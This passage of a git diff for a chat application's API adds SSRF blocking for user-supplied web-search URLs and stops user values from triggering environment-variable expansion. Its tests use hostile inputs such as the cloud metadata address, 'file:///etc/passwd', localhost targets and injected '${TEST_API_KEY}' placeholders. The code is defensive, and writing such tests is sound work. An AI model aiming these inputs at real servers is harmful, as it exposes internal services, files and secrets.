receivedOnA.push(event)); @@ -1641,7 +2136,7 @@ describe('GenerationJobManager Integration Tests', () => { replicaB.configure(servicesB); replicaB.initialize(); - const replicaBJobStore = new RedisJobStore(ioredisClient); + const replicaBJobStore = new RedisJobStore(ioredisClient!); await replicaBJobStore.initialize(); await replicaBJobStore.createJob(streamId, 'user-1'); @@ -1661,7 +2156,8 @@ describe('GenerationJobManager Integration Tests', () => { await new Promise((resolve) => setTimeout(resolve, 700)); expect(receivedOnA.length).toBe(4); - 
expect(receivedOnB.length).toBe(3); + expect(receivedOnB.length).toBe(4); + expect((receivedOnB[0] as CreatedEvent).created).toBe(true); subA?.unsubscribe(); subB?.unsubscribe(); @@ -1671,13 +2167,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Concurrent Subscriber Readiness (Redis)', () => { + describeRedis('Concurrent Subscriber Readiness (Redis)', () => { test('should return ready promise to all concurrent subscribers for same stream', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const subscriber = ( ioredisClient as unknown as { duplicate: () => typeof ioredisClient } ).duplicate()!; @@ -1706,13 +2197,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Sequence Reset Safety (Redis)', () => { + describeRedis('Sequence Reset Safety (Redis)', () => { test('should not receive stale pre-subscribe events via Redis after sequence reset', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const manager = new GenerationJobManagerClass(); const services = createStreamServices({ useRedis: true, @@ -1774,11 +2260,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should not reset sequence when second subscriber joins mid-stream', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const manager = new GenerationJobManagerClass(); const services = createStreamServices({ useRedis: true, @@ -1837,13 +2318,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Subscribe Error Recovery (Redis)', () => { + describeRedis('Subscribe Error Recovery (Redis)', () => { test('should allow resubscription after Redis subscribe failure', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const subscriber = ( ioredisClient as unknown as { 
duplicate: () => typeof ioredisClient } ).duplicate()!; @@ -1892,12 +2368,7 @@ describe('GenerationJobManager Integration Tests', () => { }); describe('createStreamServices Auto-Detection', () => { - test('should use Redis when useRedis is true and client is available', () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - + testRedis('should use Redis when useRedis is true and client is available', () => { const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, diff --git a/packages/api/src/types/events.ts b/packages/api/src/types/events.ts index 1e866fa840..d068888b17 100644 --- a/packages/api/src/types/events.ts +++ b/packages/api/src/types/events.ts @@ -1,4 +1,49 @@ -export type ServerSentEvent = { +/** SSE streaming event (on_run_step, on_message_delta, etc.) */ +export type StreamEvent = { + event: string; data: string | Record; - event?: string; }; + +/** Control event emitted when user message is created and generation starts */ +export type CreatedEvent = { + created: true; + message: { + messageId: string; + parentMessageId?: string; + conversationId?: string; + text?: string; + sender: string; + isCreatedByUser: boolean; + }; + streamId: string; +}; + +export type FinalMessageFields = { + messageId?: string; + parentMessageId?: string; + conversationId?: string; + text?: string; + content?: unknown[]; + sender?: string; + isCreatedByUser?: boolean; + unfinished?: boolean; + /** Per-message error flag — matches TMessage.error (boolean or error text) */ + error?: boolean | string; + [key: string]: unknown; +}; + +/** Terminal event emitted when generation completes or is aborted */ +export type FinalEvent = { + final: true; + requestMessage?: FinalMessageFields | null; + responseMessage?: FinalMessageFields | null; + conversation?: { conversationId?: string; [key: string]: unknown } | null; + title?: string; + aborted?: boolean; + earlyAbort?: boolean; + runMessages?: 
FinalMessageFields[]; + /** Top-level event error (abort-during-completion edge case) */ + error?: { message: string }; +}; + +export type ServerSentEvent = StreamEvent | CreatedEvent | FinalEvent; diff --git a/packages/api/src/types/stream.ts b/packages/api/src/types/stream.ts index 79b29d774f..068d9c8db8 100644 --- a/packages/api/src/types/stream.ts +++ b/packages/api/src/types/stream.ts @@ -47,3 +47,24 @@ export type ChunkHandler = (event: ServerSentEvent) => void; export type DoneHandler = (event: ServerSentEvent) => void; export type ErrorHandler = (error: string) => void; export type UnsubscribeFn = () => void; + +/** Options for subscribing to a job event stream */ +export interface SubscribeOptions { + /** + * When true, skips replaying the earlyEventBuffer. + * Use for resume connections after a sync event has been sent. + */ + skipBufferReplay?: boolean; +} + +/** Result of an atomic subscribe-with-resume operation */ +export interface SubscribeWithResumeResult { + subscription: { unsubscribe: UnsubscribeFn } | null; + resumeState: ResumeState | null; + /** + * Events that arrived between the resume snapshot and the subscribe call. + * In-memory mode: drained from earlyEventBuffer (only place they exist). + * Redis mode: empty — chunks are persisted to the store and appear in aggregatedContent on next resume. 
+ */ + pendingEvents: ServerSentEvent[]; +} diff --git a/packages/api/src/utils/__tests__/import.test.ts b/packages/api/src/utils/__tests__/import.test.ts new file mode 100644 index 0000000000..08fa94669d --- /dev/null +++ b/packages/api/src/utils/__tests__/import.test.ts @@ -0,0 +1,76 @@ +jest.mock('@librechat/data-schemas', () => ({ + logger: { info: jest.fn(), warn: jest.fn(), error: jest.fn(), debug: jest.fn() }, +})); + +import { DEFAULT_IMPORT_MAX_FILE_SIZE, resolveImportMaxFileSize } from '../import'; +import { logger } from '@librechat/data-schemas'; + +describe('resolveImportMaxFileSize', () => { + let originalEnv: string | undefined; + + beforeEach(() => { + originalEnv = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + jest.clearAllMocks(); + }); + + afterEach(() => { + if (originalEnv !== undefined) { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = originalEnv; + } else { + delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + } + }); + + it('returns 262144000 (250 MiB) when env var is not set', () => { + delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + expect(resolveImportMaxFileSize()).toBe(262144000); + expect(DEFAULT_IMPORT_MAX_FILE_SIZE).toBe(262144000); + }); + + it('returns default when env var is empty string', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = ''; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + }); + + it('respects a custom numeric value', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '5242880'; + expect(resolveImportMaxFileSize()).toBe(5242880); + }); + + it('parses string env var to number', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '1048576'; + expect(resolveImportMaxFileSize()).toBe(1048576); + }); + + it('falls back to default and warns for non-numeric string', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'abc'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + 
expect(logger.warn).toHaveBeenCalledWith( + expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); + + it('falls back to default and warns for negative values', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '-100'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + expect(logger.warn).toHaveBeenCalledWith( + expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); + + it('falls back to default and warns for zero', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '0'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + expect(logger.warn).toHaveBeenCalledWith( + expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); + + it('falls back to default and warns for Infinity', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'Infinity'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + expect(logger.warn).toHaveBeenCalledWith( + expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); +}); diff --git a/packages/api/src/utils/env.spec.ts b/packages/api/src/utils/env.spec.ts index c241cb2b51..e1244fa605 100644 --- a/packages/api/src/utils/env.spec.ts +++ b/packages/api/src/utils/env.spec.ts @@ -111,12 +111,12 @@ describe('encodeHeaderValue', () => { describe('resolveHeaders', () => { beforeEach(() => { process.env.TEST_API_KEY = 'test-api-key-value'; - process.env.ANOTHER_SECRET = 'another-secret-value'; + process.env.ANOTHER_VALUE = 'another-test-value'; }); afterEach(() => { delete process.env.TEST_API_KEY; - delete process.env.ANOTHER_SECRET; + delete process.env.ANOTHER_VALUE; }); it('should return empty object when headers is undefined', () => { @@ -139,7 +139,7 @@ describe('resolveHeaders', () => { it('should process environment variables in headers', () => { const headers = { Authorization: '${TEST_API_KEY}', - 'X-Secret': 
'${ANOTHER_SECRET}', + 'X-Secret': '${ANOTHER_VALUE}', 'Content-Type': 'application/json', }; @@ -147,7 +147,7 @@ describe('resolveHeaders', () => { expect(result).toEqual({ Authorization: 'test-api-key-value', - 'X-Secret': 'another-secret-value', + 'X-Secret': 'another-test-value', 'Content-Type': 'application/json', }); }); @@ -526,6 +526,40 @@ describe('resolveHeaders', () => { expect(result['X-Conversation']).toBe('conv-123'); }); + it('should not resolve env vars introduced via LIBRECHAT_BODY placeholders', () => { + const body = { + conversationId: '${TEST_API_KEY}', + parentMessageId: '${TEST_API_KEY}', + messageId: '${TEST_API_KEY}', + }; + const headers = { + 'X-Conv': '{{LIBRECHAT_BODY_CONVERSATIONID}}', + 'X-Parent': '{{LIBRECHAT_BODY_PARENTMESSAGEID}}', + 'X-Msg': '{{LIBRECHAT_BODY_MESSAGEID}}', + }; + const result = resolveHeaders({ headers, body }); + + expect(result['X-Conv']).toBe('${TEST_API_KEY}'); + expect(result['X-Parent']).toBe('${TEST_API_KEY}'); + expect(result['X-Msg']).toBe('${TEST_API_KEY}'); + }); + + it('should not resolve env vars introduced via LIBRECHAT_USER placeholders', () => { + const user = createTestUser({ name: '${TEST_API_KEY}' }); + const headers = { 'X-Name': '{{LIBRECHAT_USER_NAME}}' }; + const result = resolveHeaders({ headers, user }); + + expect(result['X-Name']).toBe('${TEST_API_KEY}'); + }); + + it('should not resolve env vars introduced via customUserVars', () => { + const customUserVars = { MY_TOKEN: '${TEST_API_KEY}' }; + const headers = { Authorization: 'Bearer {{MY_TOKEN}}' }; + const result = resolveHeaders({ headers, customUserVars }); + + expect(result.Authorization).toBe('Bearer ${TEST_API_KEY}'); + }); + describe('non-string header values (type guard tests)', () => { it('should handle numeric header values without crashing', () => { const headers = { @@ -657,12 +691,12 @@ describe('resolveHeaders', () => { describe('resolveNestedObject', () => { beforeEach(() => { process.env.TEST_API_KEY = 
'test-api-key-value'; - process.env.ANOTHER_SECRET = 'another-secret-value'; + process.env.ANOTHER_VALUE = 'another-test-value'; }); afterEach(() => { delete process.env.TEST_API_KEY; - delete process.env.ANOTHER_SECRET; + delete process.env.ANOTHER_VALUE; }); it('should preserve nested object structure', () => { @@ -952,7 +986,7 @@ describe('resolveNestedObject', () => { describe('processMCPEnv', () => { beforeEach(() => { process.env.TEST_API_KEY = 'test-api-key-value'; - process.env.ANOTHER_SECRET = 'another-secret-value'; + process.env.ANOTHER_VALUE = 'another-test-value'; process.env.OAUTH_CLIENT_ID = 'oauth-client-id-value'; process.env.OAUTH_CLIENT_SECRET = 'oauth-client-secret-value'; process.env.MCP_SERVER_URL = 'https://mcp.example.com'; @@ -960,7 +994,7 @@ describe('processMCPEnv', () => { afterEach(() => { delete process.env.TEST_API_KEY; - delete process.env.ANOTHER_SECRET; + delete process.env.ANOTHER_VALUE; delete process.env.OAUTH_CLIENT_ID; delete process.env.OAUTH_CLIENT_SECRET; delete process.env.MCP_SERVER_URL; @@ -977,7 +1011,7 @@ describe('processMCPEnv', () => { command: 'mcp-server', env: { API_KEY: '${TEST_API_KEY}', - SECRET: '${ANOTHER_SECRET}', + SECRET: '${ANOTHER_VALUE}', PLAIN_VALUE: 'plain-text', }, args: ['--key', '${TEST_API_KEY}', '--url', '${MCP_SERVER_URL}'], @@ -990,7 +1024,7 @@ describe('processMCPEnv', () => { command: 'mcp-server', env: { API_KEY: 'test-api-key-value', - SECRET: 'another-secret-value', + SECRET: 'another-test-value', PLAIN_VALUE: 'plain-text', }, args: ['--key', 'test-api-key-value', '--url', 'https://mcp.example.com'], @@ -1137,6 +1171,49 @@ describe('processMCPEnv', () => { }); }); + it('should not resolve env vars introduced via body placeholders in MCP headers', () => { + const body = { + conversationId: '${TEST_API_KEY}', + parentMessageId: '${TEST_API_KEY}', + messageId: '${TEST_API_KEY}', + }; + + const options: MCPOptions = { + type: 'streamable-http', + url: 'https://api.example.com', + headers: { + 
'X-Conv': '{{LIBRECHAT_BODY_CONVERSATIONID}}', + 'X-Parent': '{{LIBRECHAT_BODY_PARENTMESSAGEID}}', + }, + }; + + const result = processMCPEnv({ options, body }); + + if (!isStreamableHTTPOptions(result)) { + throw new Error('Expected streamable-http options'); + } + expect(result.headers?.['X-Conv']).toBe('${TEST_API_KEY}'); + expect(result.headers?.['X-Parent']).toBe('${TEST_API_KEY}'); + }); + + it('should not resolve env vars introduced via customUserVars in MCP headers', () => { + const customUserVars = { MY_TOKEN: '${TEST_API_KEY}' }; + const options: MCPOptions = { + type: 'streamable-http', + url: 'https://api.example.com', + headers: { + Authorization: 'Bearer {{MY_TOKEN}}', + }, + }; + + const result = processMCPEnv({ options, customUserVars }); + + if (!isStreamableHTTPOptions(result)) { + throw new Error('Expected streamable-http options'); + } + expect(result.headers?.Authorization).toBe('Bearer ${TEST_API_KEY}'); + }); + it('should handle mixed placeholders in OAuth configuration', () => { const user = createTestUser({ id: 'user-123', diff --git a/packages/api/src/utils/env.ts b/packages/api/src/utils/env.ts index 78d6f9ebdf..adeeb24b34 100644 --- a/packages/api/src/utils/env.ts +++ b/packages/api/src/utils/env.ts @@ -226,9 +226,20 @@ function processSingleValue({ let value = originalValue; + /** + * SECURITY INVARIANT — ordering matters: + * Resolve env vars on the admin-authored template BEFORE any user-controlled + * data is substituted (customUserVars, user fields, OIDC tokens, body placeholders). + * This prevents second-order injection where user values containing ${VAR} + * patterns would otherwise be expanded against process.env. 
+ */ + if (!dbSourced) { + value = extractEnvVariable(value); + } + + /** Runs for both dbSourced and non-dbSourced — it is the only resolution DB-stored servers get */ if (customUserVars) { for (const [varName, varVal] of Object.entries(customUserVars)) { - /** Escaped varName for use in regex to avoid issues with special characters */ const escapedVarName = varName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); const placeholderRegex = new RegExp(`\\{\\{${escapedVarName}\\}\\}`, 'g'); value = value.replace(placeholderRegex, varVal); @@ -250,8 +261,6 @@ function processSingleValue({ value = processBodyPlaceholders(value, body); } - value = extractEnvVariable(value); - return value; } diff --git a/packages/api/src/utils/events.ts b/packages/api/src/utils/events.ts index 20c9583993..e084e631f5 100644 --- a/packages/api/src/utils/events.ts +++ b/packages/api/src/utils/events.ts @@ -2,14 +2,11 @@ import type { Response as ServerResponse } from 'express'; import type { ServerSentEvent } from '~/types'; /** - * Sends message data in Server Sent Events format. - * @param res - The server response. - * @param event - The message event. - * @param event.event - The type of event. - * @param event.data - The message to be sent. + * Sends a Server-Sent Event to the client. + * Empty-string StreamEvent data is silently dropped. 
*/ export function sendEvent(res: ServerResponse, event: ServerSentEvent): void { - if (typeof event.data === 'string' && event.data.length === 0) { + if ('data' in event && typeof event.data === 'string' && event.data.length === 0) { return; } res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`); diff --git a/packages/api/src/utils/import.ts b/packages/api/src/utils/import.ts new file mode 100644 index 0000000000..94a2c8f818 --- /dev/null +++ b/packages/api/src/utils/import.ts @@ -0,0 +1,20 @@ +import { logger } from '@librechat/data-schemas'; + +/** 250 MiB — default max file size for conversation imports */ +export const DEFAULT_IMPORT_MAX_FILE_SIZE = 262144000; + +/** Resolves the import file-size limit from the env var, falling back to the 250 MiB default */ +export function resolveImportMaxFileSize(): number { + const raw = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + if (!raw) { + return DEFAULT_IMPORT_MAX_FILE_SIZE; + } + const parsed = Number(raw); + if (!Number.isFinite(parsed) || parsed <= 0) { + logger.warn( + `[imports] Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES="${raw}"; using default ${DEFAULT_IMPORT_MAX_FILE_SIZE}`, + ); + return DEFAULT_IMPORT_MAX_FILE_SIZE; + } + return parsed; +} diff --git a/packages/api/src/utils/index.ts b/packages/api/src/utils/index.ts index 441c2e02d7..5b9315d8c7 100644 --- a/packages/api/src/utils/index.ts +++ b/packages/api/src/utils/index.ts @@ -6,6 +6,7 @@ export * from './email'; export * from './env'; export * from './events'; export * from './files'; +export * from './import'; export * from './generators'; export * from './graph'; export * from './path'; diff --git a/packages/api/src/web/web.spec.ts b/packages/api/src/web/web.spec.ts index c7bb3f4962..74e02b20ef 100644 --- a/packages/api/src/web/web.spec.ts +++ b/packages/api/src/web/web.spec.ts @@ -18,6 +18,14 @@ jest.mock('../utils', () => ({ }, })); +const mockIsSSRFTarget = jest.fn().mockReturnValue(false); +const mockResolveHostnameSSRF 
= jest.fn().mockResolvedValue(false); + +jest.mock('../auth', () => ({ + isSSRFTarget: (...args: unknown[]) => mockIsSSRFTarget(...args), + resolveHostnameSSRF: (...args: unknown[]) => mockResolveHostnameSSRF(...args), +})); + describe('web.ts', () => { describe('extractWebSearchEnvVars', () => { it('should return empty array if config is undefined', () => { @@ -1227,4 +1235,356 @@ describe('web.ts', () => { expect(result.authResult.firecrawlOptions).toBeUndefined(); // Should be undefined }); }); + + describe('SSRF protection for user-provided URLs', () => { + const userId = 'test-user-id'; + let mockLoadAuthValues: jest.Mock; + + beforeEach(() => { + jest.clearAllMocks(); + mockLoadAuthValues = jest.fn(); + mockIsSSRFTarget.mockReturnValue(false); + mockResolveHostnameSSRF.mockResolvedValue(false); + }); + + it('should block user-provided jinaApiUrl targeting localhost', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === 'localhost'); + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'JINA_API_URL') { + result[field] = 'http://localhost:8080/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.jinaApiUrl).toBeUndefined(); + expect(mockIsSSRFTarget).toHaveBeenCalledWith('localhost'); + }); + + it('should block user-provided firecrawlApiUrl resolving to private IP', async () => { + mockResolveHostnameSSRF.mockImplementation((hostname: string) => + 
Promise.resolve(hostname === 'evil.internal-service.com'), + ); + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 'https://evil.internal-service.com/scrape'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + const scrapersAuth = result.authTypes.find(([c]) => c === 'scrapers')?.[1]; + expect(scrapersAuth).toBe(AuthType.USER_PROVIDED); + }); + + it('should block user-provided searxngInstanceUrl targeting metadata endpoint', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === '169.254.169.254'); + + const webSearchConfig: TCustomConfig['webSearch'] = { + searxngInstanceUrl: '${SEARXNG_INSTANCE_URL}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + searchProvider: 'searxng' as SearchProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'SEARXNG_INSTANCE_URL') { + result[field] = 'http://169.254.169.254/latest/meta-data'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + 
expect(result.authResult.searxngInstanceUrl).toBeUndefined(); + expect(result.authenticated).toBe(false); + }); + + it('should allow system-defined URLs even if they match SSRF patterns', async () => { + mockIsSSRFTarget.mockReturnValue(true); + + const originalEnv = process.env; + try { + process.env = { + ...originalEnv, + JINA_API_KEY: 'system-jina-key', + JINA_API_URL: 'http://jina-internal:8080/rerank', + }; + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'JINA_API_KEY') { + result[field] = 'system-jina-key'; + } else if (field === 'JINA_API_URL') { + result[field] = 'http://jina-internal:8080/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.jinaApiUrl).toBe('http://jina-internal:8080/rerank'); + expect(result.authenticated).toBe(true); + } finally { + process.env = originalEnv; + } + }); + + it('should reject URLs with invalid format', async () => { + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 'not-a-valid-url'; + } else { + 
result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + const scrapersAuth = result.authTypes.find(([c]) => c === 'scrapers')?.[1]; + expect(scrapersAuth).toBe(AuthType.USER_PROVIDED); + }); + + it('should reject non-HTTP schemes like file://', async () => { + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 'file:///etc/passwd'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + }); + + it('should allow legitimate external URLs', async () => { + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + firecrawlApiUrl: '${FIRECRAWL_API_URL}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + scraperProvider: 'firecrawl' as ScraperProviders, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'FIRECRAWL_API_URL') { + result[field] = 
'https://api.firecrawl.dev'; + } else if (field === 'JINA_API_URL') { + result[field] = 'https://api.jina.ai/v1/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.firecrawlApiUrl).toBe('https://api.firecrawl.dev'); + expect(result.authResult.jinaApiUrl).toBe('https://api.jina.ai/v1/rerank'); + expect(result.authenticated).toBe(true); + }); + + it('should fail required URL field and mark category unauthenticated', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === '127.0.0.1'); + + const webSearchConfig: TCustomConfig['webSearch'] = { + searxngInstanceUrl: '${SEARXNG_INSTANCE_URL}', + searxngApiKey: '${SEARXNG_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + safeSearch: SafeSearchTypes.MODERATE, + searchProvider: 'searxng' as SearchProviders, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'SEARXNG_INSTANCE_URL') { + result[field] = 'http://127.0.0.1:8888/search'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authenticated).toBe(false); + const providersAuthType = result.authTypes.find( + ([category]) => category === 'providers', + )?.[1]; + expect(providersAuthType).toBe(AuthType.USER_PROVIDED); + }); + + it('should report SYSTEM_DEFINED when only user-provided field is a stripped SSRF URL', async () => { + mockIsSSRFTarget.mockImplementation((hostname: string) => hostname === 'localhost'); + + const originalEnv = process.env; + try { + process.env = { + ...originalEnv, + JINA_API_KEY: 'system-jina-key', + 
}; + + const webSearchConfig: TCustomConfig['webSearch'] = { + serperApiKey: '${SERPER_API_KEY}', + firecrawlApiKey: '${FIRECRAWL_API_KEY}', + jinaApiKey: '${JINA_API_KEY}', + jinaApiUrl: '${JINA_API_URL}', + safeSearch: SafeSearchTypes.MODERATE, + rerankerType: 'jina' as RerankerTypes, + }; + + mockLoadAuthValues.mockImplementation(({ authFields }) => { + const result: Record = {}; + authFields.forEach((field: string) => { + if (field === 'JINA_API_KEY') { + result[field] = 'system-jina-key'; + } else if (field === 'JINA_API_URL') { + result[field] = 'http://localhost:9999/rerank'; + } else { + result[field] = 'test-api-key'; + } + }); + return Promise.resolve(result); + }); + + const result = await loadWebSearchAuth({ + userId, + webSearchConfig, + loadAuthValues: mockLoadAuthValues, + }); + + expect(result.authResult.jinaApiUrl).toBeUndefined(); + expect(result.authenticated).toBe(true); + const rerankersAuth = result.authTypes.find(([c]) => c === 'rerankers')?.[1]; + expect(rerankersAuth).toBe(AuthType.SYSTEM_DEFINED); + } finally { + process.env = originalEnv; + } + }); + }); }); diff --git a/packages/api/src/web/web.ts b/packages/api/src/web/web.ts index ad172e187f..cc0d8688ca 100644 --- a/packages/api/src/web/web.ts +++ b/packages/api/src/web/web.ts @@ -13,6 +13,37 @@ import type { TWebSearchConfig, } from 'librechat-data-provider'; import type { TWebSearchKeys, TWebSearchCategories } from '@librechat/data-schemas'; +import { isSSRFTarget, resolveHostnameSSRF } from '../auth'; + +/** + * URL-type keys in TWebSearchKeys (not API keys or version strings). + * Must stay in sync with URL-typed fields in webSearchAuth (packages/data-schemas). + */ +const WEB_SEARCH_URL_KEYS = new Set([ + 'searxngInstanceUrl', + 'firecrawlApiUrl', + 'jinaApiUrl', +]); + +/** + * Returns true if the URL should be blocked for SSRF risk. + * Fail-closed: unparseable URLs and non-HTTP(S) schemes return true. 
+ */ +async function isSSRFUrl(url: string): Promise { + let parsed: URL; + try { + parsed = new URL(url); + } catch { + return true; + } + if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') { + return true; + } + if (isSSRFTarget(parsed.hostname)) { + return true; + } + return resolveHostnameSSRF(parsed.hostname); +} export function extractWebSearchEnvVars({ keys, @@ -149,12 +180,27 @@ export async function loadWebSearchAuth({ const field = allAuthFields[j]; const value = authValues[field]; const originalKey = allKeys[j]; - if (originalKey) authResult[originalKey] = value; + if (!optionalSet.has(field) && !value) { allFieldsAuthenticated = false; break; } - if (!isUserProvided && process.env[field] !== value) { + + const isFieldUserProvided = value != null && process.env[field] !== value; + const isUrlKey = originalKey != null && WEB_SEARCH_URL_KEYS.has(originalKey); + let contributed = false; + + if (isUrlKey && isFieldUserProvided && (await isSSRFUrl(value))) { + if (!optionalSet.has(field)) { + allFieldsAuthenticated = false; + break; + } + } else if (originalKey) { + authResult[originalKey] = value; + contributed = true; + } + + if (!isUserProvided && isFieldUserProvided && contributed) { isUserProvided = true; } } diff --git a/packages/data-provider/specs/mcp.spec.ts b/packages/data-provider/specs/mcp.spec.ts new file mode 100644 index 0000000000..573769c4fa --- /dev/null +++ 